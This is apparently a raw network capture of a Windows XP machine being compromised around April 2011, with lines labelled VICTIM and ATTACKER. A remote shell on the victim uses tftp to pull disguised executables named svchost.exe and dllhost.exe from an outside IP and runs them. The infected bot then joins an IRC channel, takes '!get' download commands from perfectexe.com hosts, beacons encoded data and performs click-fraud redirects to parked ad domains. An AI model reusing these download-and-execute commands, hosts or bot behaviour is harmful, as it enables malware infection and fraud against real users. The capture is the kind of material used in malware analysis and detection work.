VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.
    C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is 3CF1-1DE8
    Directory of C:\\WINDOWS\\system32\\wins
    File Not Found
    C:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is 3CF1-1DE8
    Directory of C:\\WINDOWS\\system32\\dllcache
    File Not Found
    C:\\WINDOWS\\system32>
VICTIM: tftp -i 98.190.183.102 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 4 seconds, 7364 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 98.190.183.102 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 2 seconds, 9984 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK ozwawqgo
    USER z020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG ozwawqgo :!get http:/88.perfectexe.com:88/kp.jpg
    :u. PRIVMSG ozwawqgo :!get http:/kakgezaebalsha.com/ml2.txt
VICTIM: GET /kp.jpg HTTP/1.0
    User-Agent: Download
    Host: 88.perfectexe.com:88
    Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3A69C1DCEDCA8E5FE4F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=0.9026758 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: w.perfectexe.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /ck.jpg?t=0.6914942 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 88.perfectexe.com:88
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=8D93B65251C1EE71BFA585A8F7BB06C19C3CBF85125D910D9FFE044D993E406F0941A14B6F2FF4DF84EEA9C32E24769107FF47FE234E6939F99D522899EE7DE3991922545B89E47B9DA7A3D9749A0AD519EEA79A39478187A30181EC8A7D3ABFB5E5CFC2547BFB5452E197105A5A0D97ED1A96B93671351286DFD4BB9A2CE65816107CDBDCEDB5732D1EEBBAB27B0D8F&t=0.4057276 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: w.perfectexe.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-DB-13-FE&Publicer=100 HTTP/1.0
    User-Agent: CA 0.0.0.2
    Host: ck.perfectexe.com:89
ATTACKER: GET /sn.php?c=958B6B8FD84835AAE5FF6C41400CFC3BD0702F15B0FFC75B6203DC95BB1CA689FFB79B7102428EA5543EB1DBBDB7A1468D75EC5597FAB0E0C9AD4238BFC8FF61CB4BB5C33CEE48D7F2C87903806E02DD6B9C5964413FE2E4A507573A8473A3260555939EFBD403ACDC6F6EF890690E869663EEB042119EAC33276411309223D9FBEB4DE8F3C7A0686E58772731F4F68B7BA4&t=0.3045313 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: w.perfectexe.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: HTTP/1.1 200 OK
    Connection: close
    Date: Wed, 13 Apr 2011 19:26:53 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Content-Length: 1382
    Content-Type: text/html
    Set-Cookie: ASPSESSIONIDAASBTTTT=INBMJMECIHPAIGOBMNFIGCCA; path=/
    Cache-control: private

    http:/drugcuring.com301CLICKRND5NOSCRIPThttp:/modeljob.us 301CLICKRND5NOSCRIPThttp:/agentfurniture.com301CLICKRND5NOSCRIPThttp:/politicsaudio.com301CLICKRND5NOSCRIPThttp:/japaneseaffair.com301CLICKRND6NOSCRIPThttp:/mysafedating.com603CLICK/search/{|||}epl={|||}yt={|||}qsRND6NOSCRIPTCLICKforward302.aspx{|||}clickRND6NOSCRIPTCLICKRND5NOSCRIPThttp:/offshoreventures.com301CLICKRND5NOSCRIPThttp:/franchiseerotic.info603CLICKindex.php?pt=1{|||}result.php?{|||}.htm?dmn={|||}?epl={|||}search.php?{|||}index.php?Keywords={|||}click.php?{|||}htm?da={|||}/redirect?RND6NOSCRIPTCLICKindex.php?pt=3{|||}click.php?{|||}cfwd?dq={|||}click?epl={|||}redirect.php?RND6NOSCRIPTCLICKRND5NOSCRIPThttp:/equestrianisms.com301CLICKRND5NOSCRIPThttp:/paymecredit.com301CLICKRND6NOSCRIPThttp:/frontalpain.info301CLICKRND5NOSCRIPThttp:/insuranceformedicalcares.info301CLICKRND5NOSCRIPThttp:/nickserv.com301CLICKRND5NOSCRIPT
ATTACKER: GET /s5.jpg?t=0.6278345 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 88.perfectexe.com:88
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=627C27C34FDF9E36CAD2ADF4C1B68270B92E5462AF8F4CDADEECA0E9E04ABA94CD875EB33B0127144A70DBB02D115D44C53253B94B3FACFE2119ACDB39943853B9F664CCCA1E9708A59FC8B268869C4339CE6855B7C96D6BCF6DC7AA7582DC59C797575AA48BF45BCB78A423ECECD14B58AFCFE03B7CB5927A233E51AE1859E7D7DB9237B49A8149EEDBD98C70B3D357&t=0.8616602 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: w.perfectexe.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /g.php HTTP/1.0
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; waoc)
    Host: s5.perfectexe.com:88
    Pragma: no-cache
ATTACKER: GET /sn.php?c=5F4147A332A27BD3B5AD356CDFA855A7C5526D5B3F1F57C19BA99AD3E9430B25A7ED41ACD7EDD6E5C8F28FE4162ADCC5AA5D55BFC2B61E4C526A5126329FE58EF7B8AF0770A464FB142ECFB5EC029946BB4C4974710F74722C8E2F4257A03BBEA6F6919CFBD42D827DCE47D16C9565ED6D98EAB4673402302E3A24518624857F48582A8DB4857ABD291186D7E4225BD97595&t=0.8052027 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: w.perfectexe.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET / HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: drugcuring.com
    Connection: Keep-Alive
ATTACKER: HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 22410
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    p3p: CP="CAO PSA OUR"
    Set-Cookie: SessionID=32ece26c-4558-44d2-89c2-fa1704801f8a; path=/
    Set-Cookie: VisitorID=a5e6fc00-fbdc-471f-8b24-bc6d7334c8ff&Exp=4/13/2014 12:27:28 PM; expires=Sun, 13-Apr-2014 19:27:28 GMT; path=/
    X-Powered-By: ASP.NET
    Date: Wed, 13 Apr 2011 19:27:28 GMT
    Connection: keep-alive

    Cash Advance | Debt Consolidation | Insurance | Free Credit Report | Cell Phones at Drugcuring.com
ATTACKER: GET /js/json.js?rte=1&tm=2&dn=drugcuring.com&tid=516 HTTP/1.0
    Accept: */*
    Referer: http:/drugcuring.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: drugcuring.com
    Connection: Keep-Alive
    Cookie: SessionID=32ece26c-4558-44d2-89c2-fa1704801f8a; VisitorID=a5e6fc00-fbdc-471f-8b24-bc6d7334c8ff&Exp=4/13/2014 12:27:28 PM
ATTACKER: HTTP/1.1 200 OKCache-Control: privateContent-Length: 6769Content-Type: text/javascript; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Wed, 13 Apr 2011 19:27:28 GMTConnection: keep-aliveif (!this.JSON) { this.JSON = {};}(function() { function f(n) { return n < 10 ? '0' + n : n; } if (typeof Date.prototype.toJSON !== 'function') { Date.prototype.toJSON = function(key) { return isFinite(this.valueOf()) ? this.getUTCFullYear() + '-' + f(this.getUTCMonth() + 1) + '-' + f(this.getUTCDate()) + 'T' + f(this.getUTCHours()) + ':' + f(this.getUTCMinutes()) + ':' + f(this.getUTCSeconds()) + 'Z' : null; }; String.prototype.toJSON = Number.prototype.toJSON = Boolean.prototype.toJSON = function(key) { return this.valueOf(); }; } var cx = /[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g, escapable = /[\\\\\\\\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g, gap, indent, meta = { '\\b': '\\\\b', '\\t': '\\\\t', '\': '\\\', '\\f': '\\\\f',
ATTACKER: '\': '\\\', '\': '\\\\\', '\\\\': '\\\\\\\\' }, rep; function quote(string) { escapable.lastIndex = 0; return escapable.test(string) ? '\' + string.replace(escapable, function(a) { var c = meta[a]; return typeof c === 'string' ? c : '\\\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4); }) + '\' : '\' + string + '\'; } function str(key, holder) { var i, k, v, length, mind = gap, partial, value = holder[key]; if (value && typeof value === 'object' && typeof value.toJSON === 'function') { value = value.toJSON(key); } if (typeof rep === 'function') { value = rep.call(holder, key, value); } switch (typeof value) { case 'string': return quote(value); case 'number': return isFinite(value) ? String(value) : 'null'; case 'boolean': case 'null': return String(value); case 'object': if (!value) { return 'null'; } gap += indent; partial = []; if (Object.
ATTACKER: prototype.toString.apply(value) === '[object Array]') { length = value.length; for (i = 0; i < length; i += 1) { partial[i] = str(i, value) || 'null'; } v = partial.length === 0 ? '[]' : gap ? '[\' + gap + partial.join(',\' + gap) + '\' + mind + ']' : '[' + partial.join(',') + ']'; gap = mind; return v; } if (rep && typeof rep === 'object') { length = rep.length; for (i = 0; i < length; i += 1) { k = rep[i]; if (typeof k === 'string') { v = str(k, value); if (v) { partial.push(quote(k) + (gap ? ': ' : ':') + v); } } } } else { for (k in value) { if (Object.hasOwnProperty.call(value, k)) { v = str(k, value); if (v) { partial.push(quote(k) + (gap ? ': ' : ':') + v); } }
ATTACKER: } } v = partial.length === 0 ? '{}' : gap ? '{\' + gap + partial.join(',\' + gap) + '\' + mind + '}' : '{' + partial.join(',') + '}'; gap = mind; return v; } } if (typeof JSON.stringify !== 'function') { JSON.stringify = function(value, replacer, space) { var i; gap = ''; indent = ''; if (typeof space === 'number') { for (i = 0; i < space; i += 1) { indent += ' '; } } else if (typeof space === 'string') { indent = space; } rep = replacer; if (replacer && typeof replacer !== 'function' && (typeof replacer !== 'object' || typeof replacer.length !== 'number')) { throw new Error('JSON.stringify'); } return str('', { '': value }); }; } if (typeof JSON.parse !== 'function') { JSON.parse = function(text, reviver) { var j; function walk(holder, key) { var k, v, value = holder[key]; if (value && typeof value === 'object') { for (k in value) { if (Object.hasOwnProperty.call(value, k)) {
ATTACKER: v = walk(value, k); if (v !== undefined) { value[k] = v; } else { delete value[k]; } } } } return reviver.call(holder, key, value); } text = String(text); cx.lastIndex = 0; if (cx.test(text)) { text = text.replace(cx, function(a) { return '\\\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4); }); } if (/^[\\],:{}\\s]*\$/.test(text.replace(/\\\\(?:[\\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@').replace(/\[^\\\\\\\]*\|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g, ']').replace(/(?:^|:|,)(?:\\s*\\[)+/g, ''))) { j = eval('(' + text + ')'); return typeof reviver === 'function' ? walk({ '': j }, '') : j; } throw new SyntaxError('JSON.parse'); }; }} ());
ATTACKER: GET /css/style.css?rte=1&tm=2&dn=drugcuring.com&tid=516&def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontColor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsrCust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8 HTTP/1.0
    Accept: */*
    Referer: http:/drugcuring.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: drugcuring.com
    Connection: Keep-Alive
    Cookie: SessionID=32ece26c-4558-44d2-89c2-fa1704801f8a; VisitorID=a5e6fc00-fbdc-471f-8b24-bc6d7334c8ff&Exp=4/13/2014 12:27:28 PM
ATTACKER: GET /images/template/360x318/ist2_746781_female_student.jpg HTTP/1.0
    Accept: */*
    Referer: http:/drugcuring.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: i.nuseek.com
    Connection: Keep-Alive
ATTACKER: GET /images/misc/blank.gif HTTP/1.0
    Accept: */*
    Referer: http:/drugcuring.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: i.nuseek.com
    Connection: Keep-Alive
ATTACKER: GET /images/Themes/T101/buttons/0006.gif HTTP/1.0
    Accept: */*
    Referer: http:/drugcuring.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: i.nuseek.com
    Connection: Keep-Alive
ATTACKER: GET /apps/domainpark/show_afd_ads.js HTTP/1.0
    Accept: */*
    Referer: http:/drugcuring.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: pagead2.googlesyndication.com
    Connection: Keep-Alive
ATTACKER: GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-demandmedia-radlinks&domain_name=drugcuring.com&s=drugcuring.com&adsafe=medium&num_radlinks=15&dt=1199985758311&u_tz=-480&u_his=0&u_h=600&u_w=800&frm=0&aref=undefined HTTP/1.0
    Accept: */*
    Referer: http:/drugcuring.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: googleads.g.doubleclick.net
    Connection: Keep-Alive
ATTACKER: GET / HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: modeljob.us
    Connection: Keep-Alive
ATTACKER: GET /?o_id=62461&domainname=modeljob.us HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: searchportal.information.com
    Connection: Keep-Alive